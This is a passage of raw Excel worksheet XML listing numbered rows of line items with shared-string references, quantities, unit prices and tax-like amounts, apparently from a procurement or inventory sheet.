      <c r="K337" s="16"/>
    </row>
    <row r="338" spans="2:11">
      <c r="B338" s="9">
        <v>335</v>
      </c>
      <c r="C338" s="238" t="s">
        <v>5484</v>
      </c>
      <c r="D338" s="238" t="s">
        <v>5485</v>
      </c>
      <c r="E338" s="238" t="s">
        <v>5486</v>
      </c>
      <c r="F338" s="9"/>
      <c r="G338" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H338" s="10">
        <v>1</v>
      </c>
      <c r="I338" s="14">
        <v>262.4</v>
      </c>
      <c r="J338" s="15">
        <v>41.984</v>
      </c>
      <c r="K338" s="16"/>
    </row>
    <row r="339" spans="2:11">
      <c r="B339" s="9">
        <v>336</v>
      </c>
      <c r="C339" s="238" t="s">
        <v>5487</v>
      </c>
      <c r="D339" s="238" t="s">
        <v>5488</v>
      </c>
      <c r="E339" s="238" t="s">
        <v>5461</v>
      </c>
      <c r="F339" s="238" t="s">
        <v>5489</v>
      </c>
      <c r="G339" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H339" s="10">
        <v>1</v>
      </c>
      <c r="I339" s="14">
        <v>47.01</v>
      </c>
      <c r="J339" s="15">
        <v>7.5216</v>
      </c>
      <c r="K339" s="16"/>
    </row>
    <row r="340" spans="2:11">
      <c r="B340" s="9">
        <v>337</v>
      </c>
      <c r="C340" s="238" t="s">
        <v>5490</v>
      </c>
      <c r="D340" s="9"/>
      <c r="E340" s="238" t="s">
        <v>5491</v>
      </c>
      <c r="F340" s="9"/>
      <c r="G340" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H340" s="10">
        <v>10</v>
      </c>
      <c r="I340" s="14">
        <v>59.83</v>
      </c>
      <c r="J340" s="15">
        <v>9.568</v>
      </c>
      <c r="K340" s="16"/>
    </row>
    <row r="341" spans="2:11">
      <c r="B341" s="9">
        <v>338</v>
      </c>
      <c r="C341" s="238" t="s">
        <v>5492</v>
      </c>
      <c r="D341" s="238" t="s">
        <v>5493</v>
      </c>
      <c r="E341" s="238" t="s">
        <v>5494</v>
      </c>
      <c r="F341" s="9"/>
      <c r="G341" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H341" s="10">
        <v>6.45</v>
      </c>
      <c r="I341" s="14">
        <v>657.94</v>
      </c>
      <c r="J341" s="15">
        <v>105.27432</v>
      </c>
      <c r="K341" s="16"/>
    </row>
    <row r="342" spans="2:11">
      <c r="B342" s="9">
        <v>339</v>
      </c>
      <c r="C342" s="238" t="s">
        <v>5496</v>
      </c>
      <c r="D342" s="9"/>
      <c r="E342" s="238" t="s">
        <v>5497</v>
      </c>
      <c r="F342" s="9"/>
      <c r="G342" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H342" s="10">
        <v>30</v>
      </c>
      <c r="I342" s="14">
        <v>783.65</v>
      </c>
      <c r="J342" s="15">
        <v>125.376</v>
      </c>
      <c r="K342" s="16"/>
    </row>
    <row r="343" spans="2:11">
      <c r="B343" s="9">
        <v>340</v>
      </c>
      <c r="C343" s="238" t="s">
        <v>5498</v>
      </c>
      <c r="D343" s="238" t="s">
        <v>5499</v>
      </c>
      <c r="E343" s="238" t="s">
        <v>5500</v>
      </c>
      <c r="F343" s="9"/>
      <c r="G343" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H343" s="10">
        <v>64</v>
      </c>
      <c r="I343" s="14">
        <v>91.84</v>
      </c>
      <c r="J343" s="15">
        <v>14.7456</v>
      </c>
      <c r="K343" s="16"/>
    </row>
    <row r="344" spans="2:11">
      <c r="B344" s="9">
        <v>341</v>
      </c>
      <c r="C344" s="238" t="s">
        <v>5501</v>
      </c>
      <c r="D344" s="238" t="s">
        <v>5502</v>
      </c>
      <c r="E344" s="238" t="s">
        <v>5503</v>
      </c>
      <c r="F344" s="238" t="s">
        <v>5504</v>
      </c>
      <c r="G344" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H344" s="10">
        <v>68</v>
      </c>
      <c r="I344" s="14">
        <v>120.39</v>
      </c>
      <c r="J344" s="15">
        <v>19.2576</v>
      </c>
      <c r="K344" s="16"/>
    </row>
    <row r="345" spans="2:11">
      <c r="B345" s="9">
        <v>342</v>
      </c>
      <c r="C345" s="238" t="s">
        <v>5505</v>
      </c>
      <c r="D345" s="238" t="s">
        <v>5506</v>
      </c>
      <c r="E345" s="238" t="s">
        <v>5507</v>
      </c>
      <c r="F345" s="238" t="s">
        <v>5508</v>
      </c>
      <c r="G345" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H345" s="10">
        <v>8</v>
      </c>
      <c r="I345" s="14">
        <v>567.52</v>
      </c>
      <c r="J345" s="15">
        <v>90.8032</v>
      </c>
      <c r="K345" s="16"/>
    </row>
    <row r="346" spans="2:11">
      <c r="B346" s="9">
        <v>343</v>
      </c>
      <c r="C346" s="238" t="s">
        <v>5509</v>
      </c>
      <c r="D346" s="9"/>
      <c r="E346" s="238" t="s">
        <v>5510</v>
      </c>
      <c r="F346" s="238" t="s">
        <v>5511</v>
      </c>
      <c r="G346" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H346" s="10">
        <v>3</v>
      </c>
      <c r="I346" s="14">
        <v>68.37</v>
      </c>
      <c r="J346" s="15">
        <v>10.9392</v>
      </c>
      <c r="K346" s="16"/>
    </row>
    <row r="347" spans="2:11">
      <c r="B347" s="9">
        <v>344</v>
      </c>
      <c r="C347" s="238" t="s">
        <v>5512</v>
      </c>
      <c r="D347" s="9"/>
      <c r="E347" s="238" t="s">
        <v>5513</v>
      </c>
      <c r="F347" s="238" t="s">
        <v>5514</v>
      </c>
      <c r="G347" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H347" s="10">
        <v>4</v>
      </c>
      <c r="I347" s="14">
        <v>46.15</v>
      </c>
      <c r="J347" s="15">
        <v>7.3856</v>
      </c>
      <c r="K347" s="16"/>
    </row>
    <row r="348" spans="2:11">
      <c r="B348" s="9">
        <v>345</v>
      </c>
      <c r="C348" s="238" t="s">
        <v>5515</v>
      </c>
      <c r="D348" s="9"/>
      <c r="E348" s="238" t="s">
        <v>5513</v>
      </c>
      <c r="F348" s="238" t="s">
        <v>5516</v>
      </c>
      <c r="G348" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H348" s="10">
        <v>5</v>
      </c>
      <c r="I348" s="14">
        <v>59.82</v>
      </c>
      <c r="J348" s="15">
        <v>9.568</v>
      </c>
      <c r="K348" s="16"/>
    </row>
    <row r="349" spans="2:11">
      <c r="B349" s="9">
        <v>350</v>
      </c>
      <c r="C349" s="238" t="s">
        <v>5517</v>
      </c>
      <c r="D349" s="238" t="s">
        <v>5518</v>
      </c>
      <c r="E349" s="238" t="s">
        <v>5519</v>
      </c>
      <c r="F349" s="9"/>
      <c r="G349" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H349" s="10">
        <v>1</v>
      </c>
      <c r="I349" s="14">
        <v>688.03</v>
      </c>
      <c r="J349" s="15">
        <v>110.0848</v>
      </c>
      <c r="K349" s="16"/>
    </row>
    <row r="350" spans="2:11">
      <c r="B350" s="9">
        <v>351</v>
      </c>
      <c r="C350" s="238" t="s">
        <v>5520</v>
      </c>
      <c r="D350" s="238" t="s">
        <v>5521</v>
      </c>
      <c r="E350" s="238" t="s">
        <v>5522</v>
      </c>
      <c r="F350" s="238" t="s">
        <v>5523</v>
      </c>
      <c r="G350" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H350" s="10">
        <v>100</v>
      </c>
      <c r="I350" s="14">
        <v>31.63</v>
      </c>
      <c r="J350" s="15">
        <v>5.12</v>
      </c>
      <c r="K350" s="16"/>
    </row>
    <row r="351" spans="2:11">
      <c r="B351" s="9">
        <v>352</v>
      </c>
      <c r="C351" s="238" t="s">
        <v>5524</v>
      </c>
      <c r="D351" s="238" t="s">
        <v>4824</v>
      </c>
      <c r="E351" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F351" s="238" t="s">
        <v>5450</v>
      </c>
      <c r="G351" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H351" s="10">
        <v>3</v>
      </c>
      <c r="I351" s="14">
        <v>1401.71</v>
      </c>
      <c r="J351" s="15">
        <v>224.2752</v>
      </c>
      <c r="K351" s="16"/>
    </row>
    <row r="352" spans="2:11">
      <c r="B352" s="9">
        <v>354</v>
      </c>
      <c r="C352" s="238" t="s">
        <v>5525</v>
      </c>
      <c r="D352" s="238" t="s">
        <v>5526</v>
      </c>
      <c r="E352" s="238" t="s">
        <v>5527</v>
      </c>
      <c r="F352" s="9"/>
      <c r="G352" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H352" s="10">
        <v>24</v>
      </c>
      <c r="I352" s="14">
        <v>185.3</v>
      </c>
      <c r="J352" s="15">
        <v>29.6448</v>
      </c>
      <c r="K352" s="16"/>
    </row>
    <row r="353" spans="2:11">
      <c r="B353" s="9">
        <v>355</v>
      </c>
      <c r="C353" s="238" t="s">
        <v>5528</v>
      </c>
      <c r="D353" s="238" t="s">
        <v>5529</v>
      </c>
      <c r="E353" s="238" t="s">
        <v>5530</v>
      </c>
      <c r="F353" s="9"/>
      <c r="G353" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H353" s="10">
        <v>10</v>
      </c>
      <c r="I353" s="14">
        <v>21.37</v>
      </c>
      <c r="J353" s="15">
        <v>3.424</v>
      </c>
      <c r="K353" s="16"/>
    </row>
    <row r="354" spans="2:11">
      <c r="B354" s="9">
        <v>356</v>
      </c>
      <c r="C354" s="238" t="s">
        <v>5531</v>
      </c>
      <c r="D354" s="238" t="s">
        <v>5532</v>
      </c>
      <c r="E354" s="238" t="s">
        <v>5533</v>
      </c>
      <c r="F354" s="238" t="s">
        <v>5534</v>
      </c>
      <c r="G354" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H354" s="10">
        <v>3</v>
      </c>
      <c r="I354" s="14">
        <v>20.66</v>
      </c>
      <c r="J354" s="15">
        <v>3.3072</v>
      </c>
      <c r="K354" s="16"/>
    </row>
    <row r="355" spans="2:11">
      <c r="B355" s="9">
        <v>357</v>
      </c>
      <c r="C355" s="238" t="s">
        <v>5535</v>
      </c>
      <c r="D355" s="238" t="s">
        <v>5536</v>
      </c>
      <c r="E355" s="238" t="s">
        <v>5537</v>
      </c>
      <c r="F355" s="238" t="s">
        <v>5538</v>
      </c>
      <c r="G355" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H355" s="10">
        <v>30</v>
      </c>
      <c r="I355" s="14">
        <v>64.03</v>
      </c>
      <c r="J355" s="15">
        <v>10.224</v>
      </c>
      <c r="K355" s="16"/>
    </row>
    <row r="356" spans="2:11">
      <c r="B356" s="9">
        <v>358</v>
      </c>
      <c r="C356" s="238" t="s">
        <v>5539</v>
      </c>
      <c r="D356" s="238" t="s">
        <v>5540</v>
      </c>
      <c r="E356" s="238" t="s">
        <v>5541</v>
      </c>
      <c r="F356" s="9"/>
      <c r="G356" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H356" s="10">
        <v>2</v>
      </c>
      <c r="I356" s="14">
        <v>35.21</v>
      </c>
      <c r="J356" s="15">
        <v>5.6352</v>
      </c>
      <c r="K356" s="16"/>
    </row>
    <row r="357" spans="2:11">
      <c r="B357" s="9">
        <v>359</v>
      </c>
      <c r="C357" s="238" t="s">
        <v>5542</v>
      </c>
      <c r="D357" s="238" t="s">
        <v>5543</v>
      </c>
      <c r="E357" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F357" s="238" t="s">
        <v>5544</v>
      </c>
      <c r="G357" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H357" s="10">
        <v>20</v>
      </c>
      <c r="I357" s="14">
        <v>869.56</v>
      </c>
      <c r="J357" s="15">
        <v>139.136</v>
      </c>
      <c r="K357" s="16"/>
    </row>
    <row r="358" spans="2:11">
      <c r="B358" s="9">
        <v>360</v>
      </c>
      <c r="C358" s="238" t="s">
        <v>5545</v>
      </c>
      <c r="D358" s="238" t="s">
        <v>5543</v>
      </c>
      <c r="E358" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F358" s="238" t="s">
        <v>5546</v>
      </c>
      <c r="G358" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H358" s="10">
        <v>8</v>
      </c>
      <c r="I358" s="14">
        <v>352.11</v>
      </c>
      <c r="J358" s="15">
        <v>56.3328</v>
      </c>
      <c r="K358" s="16"/>
    </row>
    <row r="359" spans="2:11">
      <c r="B359" s="9">
        <v>361</v>
      </c>
      <c r="C359" s="238" t="s">
        <v>5547</v>
      </c>
      <c r="D359" s="238" t="s">
        <v>5548</v>
      </c>
      <c r="E359" s="238" t="s">
        <v>5549</v>
      </c>
      <c r="F359" s="238" t="s">
        <v>5550</v>
      </c>
      <c r="G359" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H359" s="10">
        <v>1</v>
      </c>
      <c r="I359" s="14">
        <v>26.28</v>
      </c>
      <c r="J359" s="15">
        <v>4.2048</v>
      </c>
      <c r="K359" s="16"/>
    </row>
    <row r="360" spans="2:11">
      <c r="B360" s="9">
        <v>362</v>
      </c>
      <c r="C360" s="238" t="s">
        <v>5551</v>
      </c>
      <c r="D360" s="238" t="s">
        <v>5552</v>
      </c>
      <c r="E360" s="238" t="s">
        <v>5553</v>
      </c>
      <c r="F360" s="9"/>
      <c r="G360" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H360" s="10">
        <v>10</v>
      </c>
      <c r="I360" s="14">
        <v>68.38</v>
      </c>
      <c r="J360" s="15">
        <v>10.944</v>
      </c>
      <c r="K360" s="16"/>
    </row>
    <row r="361" spans="2:11">
      <c r="B361" s="9">
        <v>363</v>
      </c>
      <c r="C361" s="238" t="s">
        <v>5554</v>
      </c>
      <c r="D361" s="9"/>
      <c r="E361" s="238" t="s">
        <v>5555</v>
      </c>
      <c r="F361" s="9"/>
      <c r="G361" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H361" s="10">
        <v>15</v>
      </c>
      <c r="I361" s="14">
        <v>64.1</v>
      </c>
      <c r="J361" s="15">
        <v>10.248</v>
      </c>
      <c r="K361" s="16"/>
    </row>
    <row r="362" spans="2:11">
      <c r="B362" s="9">
        <v>364</v>
      </c>
      <c r="C362" s="238" t="s">
        <v>5556</v>
      </c>
      <c r="D362" s="238" t="s">
        <v>5557</v>
      </c>
      <c r="E362" s="238" t="s">
        <v>5558</v>
      </c>
      <c r="F362" s="238" t="s">
        <v>5559</v>
      </c>
      <c r="G362" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H362" s="10">
        <v>5</v>
      </c>
      <c r="I362" s="14">
        <v>257.17</v>
      </c>
      <c r="J362" s="15">
        <v>41.144</v>
      </c>
      <c r="K362" s="16"/>
    </row>
    <row r="363" spans="2:11">
      <c r="B363" s="9">
        <v>365</v>
      </c>
      <c r="C363" s="238" t="s">
        <v>5560</v>
      </c>
      <c r="D363" s="238" t="s">
        <v>5561</v>
      </c>
      <c r="E363" s="238" t="s">
        <v>5562</v>
      </c>
      <c r="F363" s="9"/>
      <c r="G363" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H363" s="10">
        <v>9</v>
      </c>
      <c r="I363" s="14">
        <v>157.23</v>
      </c>
      <c r="J363" s="15">
        <v>25.1568</v>
      </c>
      <c r="K363" s="16"/>
    </row>
    <row r="364" spans="2:11">
      <c r="B364" s="9">
        <v>366</v>
      </c>
      <c r="C364" s="238" t="s">
        <v>5563</v>
      </c>
      <c r="D364" s="9"/>
      <c r="E364" s="238" t="s">
        <v>5558</v>
      </c>
      <c r="F364" s="238" t="s">
        <v>5564</v>
      </c>
      <c r="G364" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H364" s="10">
        <v>9</v>
      </c>
      <c r="I364" s="14">
        <v>263.34</v>
      </c>
      <c r="J364" s="15">
        <v>42.1344</v>
      </c>
      <c r="K364" s="16"/>
    </row>
    <row r="365" spans="2:11">
      <c r="B365" s="9">
        <v>367</v>
      </c>
      <c r="C365" s="238" t="s">
        <v>5565</v>
      </c>
      <c r="D365" s="9"/>
      <c r="E365" s="238" t="s">
        <v>5566</v>
      </c>
      <c r="F365" s="9"/>
      <c r="G365" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H365" s="10">
        <v>1</v>
      </c>
      <c r="I365" s="14">
        <v>37.6</v>
      </c>
      <c r="J365" s="15">
        <v>6.016</v>
      </c>
      <c r="K365" s="16"/>
    </row>
    <row r="366" spans="2:11">
      <c r="B366" s="9">
        <v>368</v>
      </c>
      <c r="C366" s="238" t="s">
        <v>5567</v>
      </c>
      <c r="D366" s="238" t="s">
        <v>5561</v>
      </c>
      <c r="E366" s="238" t="s">
        <v>5562</v>
      </c>
      <c r="F366" s="9"/>
      <c r="G366" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H366" s="10">
        <v>7</v>
      </c>
      <c r="I366" s="14">
        <v>114.34</v>
      </c>
      <c r="J366" s="15">
        <v>18.2896</v>
      </c>
      <c r="K366" s="16"/>
    </row>
    <row r="367" spans="2:11">
      <c r="B367" s="9">
        <v>369</v>
      </c>
      <c r="C367" s="238" t="s">
        <v>5568</v>
      </c>
      <c r="D367" s="238" t="s">
        <v>5557</v>
      </c>
      <c r="E367" s="238" t="s">
        <v>5558</v>
      </c>
      <c r="F367" s="238" t="s">
        <v>5569</v>
      </c>
      <c r="G367" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H367" s="10">
        <v>1</v>
      </c>
      <c r="I367" s="14">
        <v>21.36</v>
      </c>
      <c r="J367" s="15">
        <v>3.4176</v>
      </c>
      <c r="K367" s="16"/>
    </row>
    <row r="368" spans="2:11">
      <c r="B368" s="9">
        <v>370</v>
      </c>
      <c r="C368" s="238" t="s">
        <v>5570</v>
      </c>
      <c r="D368" s="238" t="s">
        <v>5571</v>
      </c>
      <c r="E368" s="238" t="s">
        <v>5572</v>
      </c>
      <c r="F368" s="9"/>
      <c r="G368" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H368" s="10">
        <v>7</v>
      </c>
      <c r="I368" s="14">
        <v>1669.6</v>
      </c>
      <c r="J368" s="15">
        <v>267.1312</v>
      </c>
      <c r="K368" s="16"/>
    </row>
    <row r="369" spans="2:11">
      <c r="B369" s="9">
        <v>371</v>
      </c>
      <c r="C369" s="238" t="s">
        <v>5573</v>
      </c>
      <c r="D369" s="9"/>
      <c r="E369" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F369" s="238" t="s">
        <v>4204</v>
      </c>
      <c r="G369" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H369" s="10">
        <v>1</v>
      </c>
      <c r="I369" s="14">
        <v>1025.64</v>
      </c>
      <c r="J369" s="15">
        <v>164.1024</v>
      </c>
      <c r="K369" s="16"/>
    </row>
    <row r="370" spans="2:11">
      <c r="B370" s="9">
        <v>372</v>
      </c>
      <c r="C370" s="238" t="s">
        <v>5574</v>
      </c>
      <c r="D370" s="238" t="s">
        <v>4824</v>
      </c>
      <c r="E370" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F370" s="238" t="s">
        <v>5575</v>
      </c>
      <c r="G370" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H370" s="10">
        <v>2</v>
      </c>
      <c r="I370" s="14">
        <v>897.73</v>
      </c>
      <c r="J370" s="15">
        <v>143.6384</v>
      </c>
      <c r="K370" s="16"/>
    </row>
    <row r="371" spans="2:11">
      <c r="B371" s="9">
        <v>373</v>
      </c>
      <c r="C371" s="238" t="s">
        <v>5576</v>
      </c>
      <c r="D371" s="9"/>
      <c r="E371" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F371" s="238" t="s">
        <v>5577</v>
      </c>
      <c r="G371" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H371" s="10">
        <v>1</v>
      </c>
      <c r="I371" s="14">
        <v>1068.38</v>
      </c>
      <c r="J371" s="15">
        <v>170.9408</v>
      </c>
      <c r="K371" s="16"/>
    </row>
    <row r="372" spans="2:11">
      <c r="B372" s="9">
        <v>374</v>
      </c>
      <c r="C372" s="238" t="s">
        <v>5578</v>
      </c>
      <c r="D372" s="238" t="s">
        <v>5579</v>
      </c>
      <c r="E372" s="238" t="s">
        <v>5580</v>
      </c>
      <c r="F372" s="9"/>
      <c r="G372" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H372" s="10">
        <v>200</v>
      </c>
      <c r="I372" s="14">
        <v>55.56</v>
      </c>
      <c r="J372" s="15">
        <v>8.96</v>
      </c>
      <c r="K372" s="16"/>
    </row>
    <row r="373" spans="2:11">
      <c r="B373" s="9">
        <v>375</v>
      </c>
      <c r="C373" s="238" t="s">
        <v>5581</v>
      </c>
      <c r="D373" s="238" t="s">
        <v>5557</v>
      </c>
      <c r="E373" s="238" t="s">
        <v>5558</v>
      </c>
      <c r="F373" s="238" t="s">
        <v>5582</v>
      </c>
      <c r="G373" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H373" s="10">
        <v>1</v>
      </c>
      <c r="I373" s="14">
        <v>20.23</v>
      </c>
      <c r="J373" s="15">
        <v>3.2368</v>
      </c>
      <c r="K373" s="16"/>
    </row>
    <row r="374" spans="2:11">
      <c r="B374" s="9">
        <v>376</v>
      </c>
      <c r="C374" s="238" t="s">
        <v>5583</v>
      </c>
      <c r="D374" s="238" t="s">
        <v>5584</v>
      </c>
      <c r="E374" s="238" t="s">
        <v>5585</v>
      </c>
      <c r="F374" s="9"/>
      <c r="G374" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H374" s="10">
        <v>3</v>
      </c>
      <c r="I374" s="14">
        <v>118.59</v>
      </c>
      <c r="J374" s="15">
        <v>18.9744</v>
      </c>
      <c r="K374" s="16"/>
    </row>
    <row r="375" spans="2:11">
      <c r="B375" s="9">
        <v>377</v>
      </c>
      <c r="C375" s="238" t="s">
        <v>5586</v>
      </c>
      <c r="D375" s="238" t="s">
        <v>5587</v>
      </c>
      <c r="E375" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="F375" s="9"/>
      <c r="G375" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H375" s="10">
        <v>1</v>
      </c>
      <c r="I375" s="14">
        <v>94.01</v>
      </c>
      <c r="J375" s="15">
        <v>15.0416</v>
      </c>
      <c r="K375" s="16"/>
    </row>
    <row r="376" spans="2:11">
      <c r="B376" s="9">
        <v>378</v>
      </c>
      <c r="C376" s="238" t="s">
        <v>5588</v>
      </c>
      <c r="D376" s="238" t="s">
        <v>5589</v>
      </c>
      <c r="E376" s="238" t="s">
        <v>5590</v>
      </c>
      <c r="F376" s="238" t="s">
        <v>5591</v>
      </c>
      <c r="G376" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H376" s="10">
        <v>2</v>
      </c>
      <c r="I376" s="14">
        <v>735.04</v>
      </c>
      <c r="J376" s="15">
        <v>117.6064</v>
      </c>
      <c r="K376" s="16"/>
    </row>
    <row r="377" spans="2:11">
      <c r="B377" s="9">
        <v>379</v>
      </c>
      <c r="C377" s="238" t="s">
        <v>5592</v>
      </c>
      <c r="D377" s="238" t="s">
        <v>5561</v>
      </c>
      <c r="E377" s="238" t="s">
        <v>5562</v>
      </c>
      <c r="F377" s="238" t="s">
        <v>5593</v>
      </c>
      <c r="G377" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H377" s="10">
        <v>2</v>
      </c>
      <c r="I377" s="14">
        <v>51.28</v>
      </c>
      <c r="J377" s="15">
        <v>8.2048</v>
      </c>
      <c r="K377" s="16"/>
    </row>
    <row r="378" spans="2:11">
      <c r="B378" s="9">
        <v>380</v>
      </c>
      <c r="C378" s="238" t="s">
        <v>5594</v>
      </c>
      <c r="D378" s="238" t="s">
        <v>5595</v>
      </c>
      <c r="E378" s="238" t="s">
        <v>5596</v>
      </c>
      <c r="F378" s="238" t="s">
        <v>5597</v>
      </c>
      <c r="G378" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H378" s="10">
        <v>27</v>
      </c>
      <c r="I378" s="14">
        <v>3208.7</v>
      </c>
      <c r="J378" s="15">
        <v>513.3888</v>
      </c>
      <c r="K378" s="16"/>
    </row>
    <row r="379" spans="2:11">
      <c r="B379" s="9">
        <v>381</v>
      </c>
      <c r="C379" s="238" t="s">
        <v>5598</v>
      </c>
      <c r="D379" s="9"/>
      <c r="E379" s="238" t="s">
        <v>5599</v>
      </c>
      <c r="F379" s="238" t="s">
        <v>5600</v>
      </c>
      <c r="G379" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H379" s="10">
        <v>1</v>
      </c>
      <c r="I379" s="14">
        <v>72.65</v>
      </c>
      <c r="J379" s="15">
        <v>11.624</v>
      </c>
      <c r="K379" s="16"/>
    </row>
    <row r="380" spans="2:11">
      <c r="B380" s="9">
        <v>404</v>
      </c>
      <c r="C380" s="238" t="s">
        <v>5601</v>
      </c>
      <c r="D380" s="238" t="s">
        <v>5602</v>
      </c>
      <c r="E380" s="238" t="s">
        <v>5603</v>
      </c>
      <c r="F380" s="9"/>
      <c r="G380" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H380" s="10">
        <v>5</v>
      </c>
      <c r="I380" s="14">
        <v>138.88</v>
      </c>
      <c r="J380" s="15">
        <v>22.224</v>
      </c>
      <c r="K380" s="16"/>
    </row>
    <row r="381" spans="2:11">
      <c r="B381" s="9">
        <v>405</v>
      </c>
      <c r="C381" s="238" t="s">
        <v>5604</v>
      </c>
      <c r="D381" s="238" t="s">
        <v>5605</v>
      </c>
      <c r="E381" s="238" t="s">
        <v>5606</v>
      </c>
      <c r="F381" s="9"/>
      <c r="G381" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H381" s="10">
        <v>80</v>
      </c>
      <c r="I381" s="14">
        <v>387.57</v>
      </c>
      <c r="J381" s="15">
        <v>61.952</v>
      </c>
      <c r="K381" s="16"/>
    </row>
    <row r="382" spans="2:11">
      <c r="B382" s="9">
        <v>406</v>
      </c>
      <c r="C382" s="238" t="s">
        <v>5607</v>
      </c>
      <c r="D382" s="238" t="s">
        <v>5608</v>
      </c>
      <c r="E382" s="238" t="s">
        <v>5609</v>
      </c>
      <c r="F382" s="238" t="s">
        <v>5610</v>
      </c>
      <c r="G382" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H382" s="10">
        <v>1</v>
      </c>
      <c r="I382" s="14">
        <v>111.11</v>
      </c>
      <c r="J382" s="15">
        <v>17.7776</v>
      </c>
      <c r="K382" s="16"/>
    </row>
    <row r="383" spans="2:11">
      <c r="B383" s="9">
        <v>408</v>
      </c>
      <c r="C383" s="238" t="s">
        <v>5611</v>
      </c>
      <c r="D383" s="238" t="s">
        <v>5612</v>
      </c>
      <c r="E383" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F383" s="238" t="s">
        <v>5613</v>
      </c>
      <c r="G383" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H383" s="10">
        <v>5</v>
      </c>
      <c r="I383" s="14">
        <v>1102.57</v>
      </c>
      <c r="J383" s="15">
        <v>176.408</v>
      </c>
      <c r="K383" s="16"/>
    </row>
    <row r="384" spans="2:11">
      <c r="B384" s="9">
        <v>409</v>
      </c>
      <c r="C384" s="238" t="s">
        <v>5614</v>
      </c>
      <c r="D384" s="238" t="s">
        <v>5543</v>
      </c>
      <c r="E384" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F384" s="238" t="s">
        <v>5615</v>
      </c>
      <c r="G384" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H384" s="10">
        <v>1</v>
      </c>
      <c r="I384" s="14">
        <v>149.57</v>
      </c>
      <c r="J384" s="15">
        <v>23.9312</v>
      </c>
      <c r="K384" s="16"/>
    </row>
    <row r="385" spans="2:11">
      <c r="B385" s="9">
        <v>410</v>
      </c>
      <c r="C385" s="238" t="s">
        <v>5616</v>
      </c>
      <c r="D385" s="9"/>
      <c r="E385" s="238" t="s">
        <v>5617</v>
      </c>
      <c r="F385" s="9"/>
      <c r="G385" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H385" s="10">
        <v>4</v>
      </c>
      <c r="I385" s="14">
        <v>6700.85</v>
      </c>
      <c r="J385" s="15">
        <v>1072.1344</v>
      </c>
      <c r="K385" s="16"/>
    </row>
    <row r="386" spans="2:11">
      <c r="B386" s="9">
        <v>411</v>
      </c>
      <c r="C386" s="238" t="s">
        <v>5618</v>
      </c>
      <c r="D386" s="238" t="s">
        <v>5619</v>
      </c>
      <c r="E386" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F386" s="238" t="s">
        <v>5620</v>
      </c>
      <c r="G386" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H386" s="10">
        <v>1</v>
      </c>
      <c r="I386" s="14">
        <v>2094.02</v>
      </c>
      <c r="J386" s="15">
        <v>335.0432</v>
      </c>
      <c r="K386" s="16"/>
    </row>
    <row r="387" spans="2:11">
      <c r="B387" s="9">
        <v>412</v>
      </c>
      <c r="C387" s="238" t="s">
        <v>5621</v>
      </c>
      <c r="D387" s="238" t="s">
        <v>5622</v>
      </c>
      <c r="E387" s="238" t="s">
        <v>5623</v>
      </c>
      <c r="F387" s="9"/>
      <c r="G387" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H387" s="10">
        <v>34</v>
      </c>
      <c r="I387" s="14">
        <v>20.76</v>
      </c>
      <c r="J387" s="15">
        <v>3.3184</v>
      </c>
      <c r="K387" s="16"/>
    </row>
    <row r="388" spans="2:11">
      <c r="B388" s="9">
        <v>413</v>
      </c>
      <c r="C388" s="238" t="s">
        <v>5624</v>
      </c>
      <c r="D388" s="238" t="s">
        <v>5543</v>
      </c>
      <c r="E388" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F388" s="238" t="s">
        <v>5625</v>
      </c>
      <c r="G388" s="237" t="s">
        <v>507</v>
      </c>
